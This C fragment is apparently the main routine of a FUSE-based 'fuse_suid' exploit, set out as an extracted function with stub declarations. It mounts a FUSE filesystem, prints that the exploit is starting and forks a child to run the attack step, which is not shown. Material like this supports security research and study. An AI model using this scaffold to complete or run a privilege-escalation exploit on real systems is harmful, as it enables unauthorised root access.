
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct fuse_operations {int dummy; } ;
struct fuse {int dummy; } ;
typedef int args ;


 int EINVAL ;
 int _exit (int ) ;
 int child1 (char*) ;
 scalar_t__ fork () ;
 int fuse_loop (struct fuse*) ;
 int fuse_loop_mt (struct fuse*) ;
 struct fuse* fuse_setup (int,char**,struct fuse_operations const*,int,char**,int*,void*) ;
 int fuse_teardown (struct fuse*,char*) ;
 int printf (char*) ;

__attribute__((used)) static int fuse_main_suid(int argc, char *argv[],
             const struct fuse_operations *op,
             void *user_data)
{
   struct fuse *fuse;
   char *mountpoint;
   int multithreaded;
   int res;

   if (argc != 2) {
       printf("Usage: fuse_suid <mountpoint>\n");
       return -EINVAL;
   }

   char *args[] = {"fuse_suid", "-f", "--", argv[1], ((void*)0)};

   fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,
             op, sizeof(*op), &mountpoint,
             &multithreaded, user_data);
   if (fuse == ((void*)0))
       return 1;

   printf("FUSE initialized.  Time to have some fun...\n");
   printf("Warning: this exploit hangs on exit.  Hit Ctrl-C when done.\n");
   if (fork() == 0)
       _exit(child1(mountpoint));

   if (multithreaded)
       res = fuse_loop_mt(fuse);
   else
       res = fuse_loop(fuse);

   fuse_teardown(fuse, mountpoint);
   if (res == -1)
       return 1;

   return 0;
}
